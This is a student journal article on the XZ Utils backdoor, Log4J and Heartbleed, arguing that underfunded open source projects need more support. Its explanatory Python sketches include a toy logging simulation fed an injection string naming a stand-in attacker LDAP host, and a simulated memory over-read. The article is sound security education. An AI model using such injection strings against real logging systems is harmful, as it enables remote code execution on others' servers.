Computer Science Issue I Volume XXV

Hacked: The overlooked and under-supported open source projects holding the Internet together

About the Author: Sophia Krugler

Sophia Krugler is a senior studying Computer Engineering and Computer Science at the University of Southern California. She has interned in Silicon Valley for the past three summers, during which she has worked with both open and closed source tools.

Abstract

Given how foundational the internet is to everyday life, one would think that the components sustaining it would be exceptionally robust and secure. The reality is a bit different. Although security is a top priority for internet technologies, the maintenance needed to sustain that level of security is extremely difficult. When you add in the fact that most of the components that support the internet rely on projects maintained by small groups of volunteers, you may start to question how security is prioritized.

Introduction

In March 2024, a Microsoft software engineer working after hours accidentally discovered malicious code with the potential to allow unauthorized remote access to millions of computers [1].

Had Andres Freund not noticed unusually slow SSH logins (SSH is the most common method of remotely logging into devices over the internet) and connected the slowdown to some puzzling errors he had noticed a few weeks prior, the hack would have soon infiltrated several distributions of the Linux Operating System [2], [3], [4]. To put it into perspective, the Linux Operating System runs 96.3% of the top one million web servers and powers 85% of smartphones [5].

You’re probably wondering how malicious code with the ability to compromise Linux systems made its way into these distributions. What could have led to one of the most dangerous cyberattacks of all time boils down to a dependency on a small, open source project managed by a single volunteer [1].

The internet’s dependency on open source software

This incident brings into question whether our computer systems are as secure as we tend to believe. The short answer is no. The internet and the machines it consists of may seem to work like magic. But in reality, these systems are maintained by open source projects and voluntary efforts of individual contributors. 

Figure 1: A visualization of the internet’s dependency on volunteer projects [6].

The term “open source software” (OSS) refers to software that is publicly accessible, meaning anyone can view, duplicate, enhance, and redistribute it for free [7]. Websites like GitHub and Bitbucket host open source projects: they store the code, allow developers to make changes to it, and provide a public forum for discussing the project. OSS differs from proprietary software, which is privately owned by an enterprise and can typically only be modified by its employees.

Figure 2:  The different roles for interacting with open source software.

OSS is nearly everywhere in our computer systems. A 2023 study scanned the code of 1,067 companies and found that 96% of the codebases contain open source software. The same study found that a given application uses an average of 526 open source components [8]. To give you an idea of just how widely used open source software is, here are a few examples:

Personal computers

Our personal laptops, smartphones, and other devices run open source software. One example is the Operating System (OS). The OS is the foundational software responsible for allocating hardware resources (like your CPU) to applications (like your web browser). Without it, your device would not work. Due to the OS’s ability to perform privileged operations, its security is incredibly important.

Linux is an example of an open source OS. Organizations such as Canonical (the company behind Ubuntu), the Debian project, and Red Hat “fork”, or duplicate, the open source code of the Linux OS, make modifications, then distribute their versions [9]. These modified versions are called Linux distributions. There are also “closed source” operating systems, such as macOS and Windows. But even closed source software can rely on open source projects.

Websites and applications

The websites or mobile applications that you interact with on a daily basis use open source “libraries” — collections of code that handle common tasks. For example, open source web development libraries like jQuery simplify the code needed to render visual components and communicate over the web [10]. If you’ve visited a few websites today, chances are you’ve indirectly interacted with jQuery. One report found that over 100,000 companies use jQuery in their tech stack [11].

One of the main benefits of making a tool open source is that more developers will see its source code and suggest improvements. Thus, open source tools can be more secure and reliable than software that is kept private, because of the increased number of developers reviewing and interacting with the code [12]. 

Figure 3: A diagram showcasing the types of contributors to open source projects [13].

At the same time, the opposite can be true. When misused or poorly maintained, the visibility and accessibility of OSS can lead to vulnerabilities and malicious code, as exemplified by the incident described in the introduction, which involved a project called XZ Utils. This scenario becomes more likely when projects lack the resources they need to invest in secure practices. As explained by Google developer Filippo Valsorda in a 2021 interview with MIT Technology Review, although “open-source runs the internet and, by extension, the economy … it is extremely common even for core infrastructure projects to have a small team of maintainers, or even a single maintainer that is not paid to work on that project” [14]. Failure to routinely update open source dependencies exacerbates these problems. A 2023 study found that 84% of codebases contain an open source vulnerability [8]. This large percentage is not because the teams that manage open source tools fail to fix known vulnerabilities, but rather because applications that rely on open source software use outdated versions of the code. Listed below are a few (of many) examples of OSS cybersecurity incidents.

A closer look at the XZ Utils backdoor

That small, one-person project that could have enabled attackers to access millions of computers running the Linux OS is called XZ Utils. XZ Utils is a popular library that contains data compression and decompression algorithms, which are used to store information more efficiently [4]. On several Linux distributions, XZ Utils is loaded, by way of an intermediate library, by OpenSSH, another popular open source tool used for remotely logging into other devices. When you “SSH into” another computer through a tool like OpenSSH, it’s as if you are sitting in front of that computer, logging in. The XZ Utils backdoor could give attackers unauthorized SSH access to any computer running a version of OpenSSH that depended on a compromised version of XZ Utils. In other words, an attacker with such access could view sensitive information and compromise the health of the device.
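To see why a small compression library matters to remote logins, it helps to follow dependencies transitively. The sketch below is a simplified illustration in Python, assuming the arrangement reported on some distributions, where the SSH server loads a systemd library that in turn loads XZ Utils’ compression library (liblzma). The graph and the function name are illustrative assumptions, not a real package manifest.

```python
# Hypothetical, heavily simplified dependency graph: each key lists the
# libraries it loads directly. Real systems have far more entries.
DEPENDS_ON = {
    "sshd": ["libsystemd", "libcrypto"],
    "libsystemd": ["liblzma"],
    "liblzma": [],
    "libcrypto": [],
}


def transitive_dependencies(package, graph):
    """Return every library reachable from `package`, directly or indirectly."""
    seen = set()
    stack = list(graph.get(package, []))
    while stack:
        dep = stack.pop()
        if dep not in seen:
            seen.add(dep)
            # Follow this dependency's own dependencies as well.
            stack.extend(graph.get(dep, []))
    return seen


if __name__ == "__main__":
    print(sorted(transitive_dependencies("sshd", DEPENDS_ON)))
```

Here `transitive_dependencies("sshd", DEPENDS_ON)` includes `liblzma` even though `sshd` never lists it directly, which is how a compromise two steps away can still reach the login service.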

The attacker(s) that introduced the malicious code carried out their plan over the span of more than two years. Back in 2021, a developer named Jia Tan began contributing to the XZ Utils project. In other words, Jia Tan copied the code, modified a few lines under the guise of improving it, and requested that their changes be accepted [2]. An XZ Utils maintainer needs to approve every change before the developer can “merge” it into the official version of the code. Starting in 2022, another participant (or possibly the same one) named Jigar Kumar began complaining over the XZ Utils mailing list that changes were not being approved fast enough [1], [2]. Kumar and several other brand-new participants on the mailing list successfully pressured Lasse Collin, the longtime XZ Utils maintainer, to add another maintainer (Jia Tan) to the project.

Figure 4: Messages exchanged between Lasse Collin and Jigar Kumar before Jia Tan was added as a maintainer to XZ Utils [15]. See all messages from Jigar Kumar here.

With this maintainer role, Jia Tan gained the ability to modify the XZ Utils project without needing approval. Starting in January 2023, Jia Tan began making targeted changes to the project that went undetected until Andres Freund noticed a few suspicious errors in March of 2024 [2].

Figure 5: A graph displaying Jia Tan’s commit history (in other words, modification history) on the XZ Utils project. See Jia Tan’s complete GitHub history here.

Thankfully, Freund discovered the vulnerability early on. However, several Linux distributions contained the malicious code, including Fedora 41, Fedora Rawhide, Alpine Linux, Arch Linux, Kali Linux, and Debian testing, unstable, and experimental versions [16]. Debian is one of the most widely used Linux distributions. Note that there are no confirmed reports of attackers using the XZ Utils backdoor [16].

Apache Log4J vulnerability

Apache Log4J is an open source tool that handles logging in Java programs (i.e., recording things like error messages and user inputs). A wide range of applications, including iCloud and Twitter, use Apache Log4J [14]. In December 2021, a vulnerability was publicly disclosed in Log4J’s ability to communicate with other systems, which allowed hackers to inject malicious code into the logs, to then be executed by the system [17]. Soon after, programs aimed at exploiting this vulnerability circulated on GitHub, the most popular platform for sharing and managing code [17]. Anyone could download one of these programs and use it to execute malware on remote servers running Log4J. The discovery of the Log4J vulnerability soon led to millions of attempted attacks, many of which were successful [17]. Teams running software using vulnerable versions of Log4J rushed to take their systems offline to avoid such an attack. An updated version of the code was published shortly after, but many teams failed to upgrade their systems. A study conducted two years after the initial discovery found that of the 38,278 applications using Log4J surveyed, 38% still used vulnerable versions [18].
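The core mistake behind this class of vulnerability can be sketched in a few lines. The Python below is a toy simulation, not Log4J’s actual code or API: it assumes a logger that expands `${kind:argument}` expressions, and the `remote` handler only returns a descriptive string rather than fetching anything. All function and handler names are hypothetical.

```python
import re

# Toy lookup handlers standing in for the substitutions a logging library
# might perform. Nothing here touches the network or the environment.
LOOKUPS = {
    "env": lambda arg: f"<value of environment variable {arg}>",
    "remote": lambda arg: f"<code fetched and run from {arg}>",
}

PATTERN = re.compile(r"\$\{(\w+):([^}]*)\}")


def expand(text):
    """Replace each ${kind:arg} expression with the result of its handler."""
    def run(match):
        handler = LOOKUPS.get(match.group(1))
        return handler(match.group(2)) if handler else match.group(0)
    return PATTERN.sub(run, text)


def log_unsafe(template, user_input):
    # Flaw: attacker-controlled text is merged in BEFORE expansion, so any
    # ${...} expression it contains is treated as an instruction.
    return expand(template.replace("{}", user_input))


def log_safe(template, user_input):
    # Only the developer-written template is expanded; user input is
    # inserted afterwards as plain data.
    return expand(template).replace("{}", user_input)


if __name__ == "__main__":
    attack = "${remote:ldap://attacker.example/a}"
    print(log_unsafe("User-Agent: {}", attack))
    print(log_safe("User-Agent: {}", attack))
```

The unsafe logger acts on the attacker’s string, while the safe one records it verbatim. The difference is only the order in which expansion and insertion happen, which is part of why flaws like this are easy to miss in review.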

The Heartbleed Bug

The Heartbleed Bug is a vulnerability in the OpenSSL library, discovered in April of 2014, with the potential to expose protected information. The bug remained “in the wild” for two years before researchers discovered it [19]. SSL (short for Secure Sockets Layer) is a set of encryption technologies that allow for private communication over the internet [20]. OpenSSL is a popular open source project that implements SSL and its successor, Transport Layer Security (TLS). A bug in the OpenSSL code allowed two computers communicating over OpenSSL to see the memory contents of the other participant, exposing sensitive information like private keys and passwords [19]. The bug affected several companies, including Google, Yahoo, Netflix, and Facebook. Researchers at Codenomicon and Google Security discovered the Heartbleed Bug independently. These researchers worked with OpenSSL to create a fix before publicizing the vulnerability. Fixing the vulnerability before announcing it mitigated its potentially detrimental impacts [21]. Detecting attacks that exploit the Heartbleed Bug is extremely difficult. However, less than a week after the Heartbleed Bug was disclosed to the public, security firm Mandiant reported that it discovered a case of the Heartbleed Bug being used to gain access to the internal corporate network of an unnamed organization [22]. One of the scariest aspects of the Heartbleed Bug is that other attacks may well have occurred; we simply don’t know when or where.
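The bug itself was a missing bounds check on a “heartbeat” message, in which one side sends a short payload together with its claimed length and the other side echoes it back. The Python sketch below simulates that idea with a byte array standing in for process memory. The memory layout, secrets, and function names are invented for illustration and are not OpenSSL code.

```python
# Simulated process memory: a 4-byte heartbeat payload sits directly in
# front of unrelated, sensitive data.
PAYLOAD = b"bird"
MEMORY = bytearray(PAYLOAD + b"|user=alice;password=hunter2;key=0xDEADBEEF")
PAYLOAD_START = 0
PAYLOAD_ACTUAL_LEN = len(PAYLOAD)


def heartbeat_vulnerable(claimed_len):
    """Echo back `claimed_len` bytes, trusting the sender's length field."""
    return bytes(MEMORY[PAYLOAD_START:PAYLOAD_START + claimed_len])


def heartbeat_fixed(claimed_len):
    """Discard the request if the claimed length exceeds the real payload."""
    if claimed_len > PAYLOAD_ACTUAL_LEN:
        return b""  # silently drop the malformed request
    return bytes(MEMORY[PAYLOAD_START:PAYLOAD_START + claimed_len])


if __name__ == "__main__":
    print(heartbeat_vulnerable(4))   # honest request: only the payload
    print(heartbeat_vulnerable(40))  # dishonest request: payload plus secrets
    print(heartbeat_fixed(40))       # bounds check: nothing leaks
```

An honest request gets back exactly what it sent. A request that lies about its length gets whatever happens to sit next to the payload in memory, and because the response looks like ordinary traffic, the leak leaves little trace.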

What makes OSS uniquely vulnerable?

A common thread between many incidents pertaining to open source projects is their lack of resources and support. The XZ Utils project was understaffed, leaving its sole maintainer susceptible to social engineering tactics that gave a malicious actor authorized access to the repository [23]. At the time of the Apache Log4J incident, the project was run mainly by volunteers, who “may not have sufficient resources to prioritize security” [24]. The Heartbleed Bug occurred in part due to the limited testing and validation processes often found in projects managed by small teams [25]. The fallout of the XZ Utils, Apache Log4J, and OpenSSL incidents clearly demonstrates the importance of these projects to our digital ecosystem. These open source tools are depended on and profited from by companies worth millions and billions of dollars, yet they are maintained by small groups of often unpaid volunteers [14]. Something doesn’t feel right here.

Why not just get rid of open source?

If OSS is especially vulnerable, why not get rid of it? Why not return to a more traditional model, where all software is intellectual property that is owned and maintained by the larger projects that rely on it?

There are of course many types of open source projects. The open source projects discussed so far mainly fall under the same umbrella: they were created by a small group of individual contributors, made visible to the public, then adopted by larger projects after gaining popularity. On the other end of the spectrum are open source projects that started out as closed source projects. In fact, it is fairly common for companies to release previously proprietary projects to the public. One example is the Java programming language, which was originally developed by Sun Microsystems and is now one of the most popular languages of all time [13]. Another example is Kubernetes, a widely used container orchestration platform originally developed by Google, which, by the way, has released over 7,000 open source projects in the last five years [26]. If companies are releasing previously in-house technology for free, then they must see some benefit in buying into the open source model, right? Regardless of the size and form of the project, there are several advantages to making a piece of software open source:

1. User innovation

The OSS ecosystem has had such success in part because it relies on the joint efforts of engineers that use open source technologies. This constant feedback loop speeds up the development process and leads to quicker discoveries of bugs and other issues [27].

2. Modularity

Open source software has also succeeded due to its modularity, and correspondingly decentralized nature. The open source ecosystem is a collection of small modular projects, rather than a few large codebases. This allows projects to be worked on in parallel and manages the complexity of the system [27].

3. Shared knowledge

Using open source tools is highly beneficial for developers — even the ones that don’t actively contribute to open source projects. Suppose you’re a developer working at a company that has created an internal tool to perform some task. You run into an issue when using this tool, and you can’t get to the bottom of it. You can’t just “Google” this particular issue, because the tool is only used within your company. Instead, you have to ask for help from a developer who works on the internal tool. If you had been using an open source tool to perform the task, chances are that at some point in the tool’s lifespan, someone else ran into the exact same problem. Chances are they posted about it in a public forum, and received guidance from other developers or maintainers of the project on how to resolve the issue. Boom — just like that, you’ve found a solution, and now you can get on with your work. This accumulation of public knowledge is one of the many benefits of using open source software.

Solutions

The advantages of OSS are significant enough to support its continued involvement in the massive and complex software ecosystems that run the world. Besides, OSS is so integrated into our systems that removing it completely is infeasible. However, most members of the software development community agree that more support for open source projects is needed.

Proactive protection from dependency failures

Organizations that profit from distributing software or providing services that rely on software should bear the consequences if and when that software fails, regardless of whether the failure was introduced internally. To protect themselves from the risks of open source software, there are several actions that companies should (and already do) take.

1. Keep dependencies up to date.

As mentioned earlier, a significant portion of codebases contain vulnerabilities stemming from open source software. This is in part due to a failure to update software dependencies. The 2024 Open Source Security and Risk Analysis Report (OSSRA) found that 14% of the codebases assessed for vulnerabilities contained vulnerabilities that were over ten years old, and that 91% of codebases assessed contained components “10 versions or more behind the most current version” [28].

2. Continuously assess security and reliability of dependencies.

One of the main pieces of guidance provided by the OSSRA is to simply know what’s in your code. This can be achieved by maintaining a list of open source dependencies, regularly reviewing open source code, and staying informed on the status of open source projects [28].

3. Participate in open source dependencies.

Going one step beyond simply reading the code, companies can incentivize employees to be active contributors to open source projects, thus ensuring that the projects are properly maintained [28].
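The first two recommendations above can be sketched together: build an inventory of what is installed, then flag anything that has fallen far behind. The Python below is a minimal sketch under stated assumptions. `installed_inventory` uses the standard library’s `importlib.metadata`, so it only covers Python packages in the current environment. The release histories passed to `stale_components` are hypothetical inputs that a real tool would fetch from a package index, and the default threshold of 10 simply mirrors the OSSRA’s “10 versions or more behind” figure.

```python
from importlib import metadata


def installed_inventory():
    """Return {package name: installed version} for this Python environment."""
    inventory = {}
    for dist in metadata.distributions():
        name = dist.metadata.get("Name")
        if name:
            inventory[name] = dist.version
    return inventory


def releases_behind(installed, releases):
    """Count releases newer than `installed`.

    `releases` is assumed to be ordered oldest to newest. Returns None when
    the installed version is not in the list.
    """
    if installed not in releases:
        return None
    return len(releases) - 1 - releases.index(installed)


def stale_components(inventory, release_history, threshold=10):
    """Return {name: releases behind} for components at or past the threshold."""
    stale = {}
    for name, version in inventory.items():
        behind = releases_behind(version, release_history.get(name, []))
        if behind is not None and behind >= threshold:
            stale[name] = behind
    return stale


if __name__ == "__main__":
    # Hypothetical release history for an invented package.
    history = {"examplelib": [f"1.{i}" for i in range(15)]}
    print(stale_components({"examplelib": "1.2", "otherlib": "3.0"}, history))
    print(len(installed_inventory()), "packages installed in this environment")
```

Counting releases is a crude measure, since one missed security patch matters more than a dozen cosmetic updates, but even a simple report like this makes it harder for a dependency to go unnoticed for years.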

Adopting standard open source best practices

The open source projects themselves can reduce risk by adhering to standards like the Open Source Security Foundation’s (OpenSSF) best practices [29]. OpenSSF best practices include clearly defining the contribution process, stating requirements for acceptable contributions including required coding standards, and outlining how consumers can report vulnerabilities and bugs [30].

Funding

Of course, these measures are difficult to prioritize when open source projects are being maintained by small groups of unpaid volunteers. To ensure thorough development practices, and to fairly reward open source maintainers for their contributions, more funding for open source software is needed. 

Several organizations have committed to funding open source projects, including the Linux Foundation Core Infrastructure Initiative, the HOST program (which is funded by the Department of Homeland Security), and the Google Application Security Patch Reward Program [25]. The Core Infrastructure Initiative was created by the Linux Foundation in the aftermath of the Heartbleed Bug, and has since raised millions of dollars for improving security of open source tools. Contributors to the Core Infrastructure Initiative fund include Google, Facebook, Microsoft, Amazon, Intel, and many more [31].

Although initiatives like these are a step in the right direction, if the numerous OSS-related problems over the past few decades are any indication, these efforts are simply not enough. As explained in Research Scientist Matthew L. Levy’s article on open source cybersecurity risks, “While many major open source communities now have the advantage of corporate sponsorships and corporate employees paid for community participation, many widely used open source projects still do not” [12]. Had projects like XZ Utils, Apache Log4J, and OpenSSL received support proportional to their impact, many of the recent cybersecurity scares likely would have never occurred.

References

[1] K. Piper, “A hack nearly gained access to millions of computers. Here’s what we should learn from this.,” Vox, Apr. 12, 2024. https://www.vox.com/future-perfect/24127433/linux-hack-cyberattack-computer-security-internet-open-source-software (accessed Sep. 11, 2024).

[2] D. Goodin, “The XZ Backdoor: Everything You Need to Know,” WIRED, Apr. 02, 2024. https://www.wired.com/story/xz-backdoor-everything-you-need-to-know/#:~:text=XZ%20Utils%20is%20nearly%20ubiquitous (accessed Sep. 11, 2024).

[3] A. Freund, “A backdoor in xz [LWN.net],” lwn.net, Mar. 29, 2024. https://lwn.net/Articles/967194/ (accessed Sep. 11, 2024).

[4] C. Pernet, “XZ Utils Supply Chain Attack: A Threat Actor Spent Two Years to Implement a Linux Backdoor,” TechRepublic, Apr. 08, 2024. https://www.techrepublic.com/article/xz-backdoor-linux/ (accessed Sep. 11, 2024).

[5] Branka, “Linux Statistics – TrueList 2022,” TrueList, Sep. 01, 2023. https://truelist.co/blog/linux-statistics/ (accessed Sep. 10, 2024).

[6] XKCD, “Dependency,” XKCD. Available: https://xkcd.com/2347 (accessed: Sep. 11, 2024).

[7] OpenSource, “What is open source?,” Opensource.com, 2019. https://opensource.com/resources/what-open-source (accessed Sep. 11, 2024).

[8] F. Bals, “Open Source Trends from the 2023 OSSRA | Synopsys Blog,” www.synopsys.com, Feb. 27, 2024. https://www.synopsys.com/blogs/software-security/open-source-trends-ossra-report.html (accessed Sep. 11, 2024).

[9] packagecloud, “10 most popular Linux distributions, and why they exist | Packagecloud Blog,” blog.packagecloud.io, Sep. 14, 2021. https://blog.packagecloud.io/10-most-popular-linux-distributions-and-why-they-exist/ (accessed Sep. 11, 2024).

[10] OpenJS Foundation, “jQuery,” jquery.com. https://jquery.com/#:~:text=What%20is%20jQuery%3F (accessed Sep. 11, 2024).

[11] “Why developers like jQuery,” StackShare, 2021. https://stackshare.io/jquery  (accessed Sep. 11, 2024).

[12] M. L. Levy, “Cybersecurity Risks Unique to Open Source and What Communities Are Doing to Reduce Them,” Computer, vol. 56, no. 6, pp. 78–83, Jun. 2023, doi: https://doi.org/10.1109/mc.2023.3262903  (accessed Sep. 11, 2024).

[13] T. Kilamo, I. Hammouda, T. Mikkonen, and T. Aaltonen, “From proprietary to open source—Growing an open source ecosystem,” Journal of Systems and Software, vol. 85, no. 7, pp. 1467–1478, Jul. 2012, doi: https://doi.org/10.1016/j.jss.2011.06.071 (accessed: Sep. 05, 2024).

[14] P. O’Neill, “The internet runs on free open-source software. Who pays to fix it?,” MIT Technology Review, Dec. 17, 2021. https://www.technologyreview.com/2021/12/17/1042692/log4j-internet-open-source-hacking/ (accessed: Sep. 05, 2024).

[15] L. Collin and J. Kumar, “Re: [xz-devel] XZ for Java,” www.mail-archive.com, Jun. 08, 2022. https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html (accessed Sep. 19, 2024).

[16] R. Tatam, “XZ Utils, the xz Backdoor & What We Can Learn from Open Source CVEs | Puppet by Perforce,” Puppet by Perforce, 2024. https://www.puppet.com/blog/xz-backdoor (accessed Sep. 11, 2024).

[17] K. Gallo, “Log4J Vulnerability Explained: What It Is and How to Fix It | Built In,” builtin.com, Jun. 20, 2024. https://builtin.com/articles/log4j-vulerability-explained (accessed Sep. 11, 2024).

[18] C. Eng, “State of Log4j Vulnerabilities: How Much Did Log4Shell Change? | Veracode,” Veracode, Dec. 07, 2023. https://www.veracode.com/blog/research/state-log4j-vulnerabilities-how-much-did-log4shell-change (accessed Sep. 11, 2024).

[19] Synopsys, “Heartbleed Bug,” heartbleed.com, Jun. 03, 2020. https://heartbleed.com/ (accessed Sep. 11, 2024).

[20] T. B. Lee, “The internet, explained,” Vox, Jun. 16, 2014. https://www.vox.com/2014/6/16/18076282/the-internet (accessed Sep. 05, 2024).

[21] T. B. Lee, “The Heartbleed Bug, explained,” Vox, Jun. 19, 2014. https://www.vox.com/2014/6/19/18076318/heartbleed (accessed Sep. 11, 2024).

[22] C. Glyer and C. DiGiamo, “Attackers Exploit the Heartbleed OpenSSL Vulnerability to Circumvent Multi-factor Authentication on VPNs | Mandiant,” Google Cloud Blog, Apr. 18, 2014. https://cloud.google.com/blog/topics/threat-intelligence/attackers-exploit-heartbleed-openssl-vulnerability/ (accessed Sep. 20, 2024).

[23] IBM, “What is Social Engineering? | IBM,” www.ibm.com, 2024. https://www.ibm.com/topics/social-engineering (accessed Sep. 11, 2024).

[24] E. Schmidt and F. Long, “Protect Open-Source Software,” Wall Street Journal, Jan. 28, 2022. https://www.proquest.com/docview/2623235269 (accessed: Sep. 05, 2024).

[25] D. Wheeler and S. Khakimov, “Open Source Software Projects Needing Security Investments,” Institute for Defense Analyses, Jun. 2015. Accessed: Sep. 11, 2024. [Online]. Available: https://www.jstor.org/stable/resrep36518 

[26] S. Vargas, “2023 Open Source Contributions: A Year in Review,” Google Open Source Blog, Aug. 13, 2024. https://opensource.googleblog.com/2024/08/2023-open-source-contribution-report.html#:~:text=Over%20the%20last%205%20years (accessed Sep. 19, 2024).

[27] M. Osterloh and S. Rota, “Open source software development—Just another case of collective invention?,” Research Policy, vol. 36, no. 2, pp. 157–171, Mar. 2007, doi: https://doi.org/10.1016/j.respol.2006.10.004 (accessed Sep. 11, 2024).

[28] “Open Source Security Risk Analysis,” Synopsys.com, 2024. https://www.synopsys.com/software-integrity/resources/analyst-reports/open-source-security-risk-analysis/thankyou.html#introMenu (accessed Sep. 20, 2024).

[29] “Best Practices Badge – Open Source Security Foundation,” Openssf.org, 2024. https://openssf.org/projects/best-practices-badge/ (accessed Sep. 20, 2024).

[30] “OpenSSF Best Practices,” Bestpractices.dev, 2024. https://www.bestpractices.dev/en/criteria/0 (accessed Sep. 20, 2024).

[31] S. M. Kerner, “Linux Foundation’s CII Continues to Fund Open-Source Security Efforts,” eWEEK, Feb. 10, 2015. https://www.eweek.com/security/linux-foundation-s-cii-continues-to-fund-open-source-security-efforts/ (accessed Sep. 19, 2024).
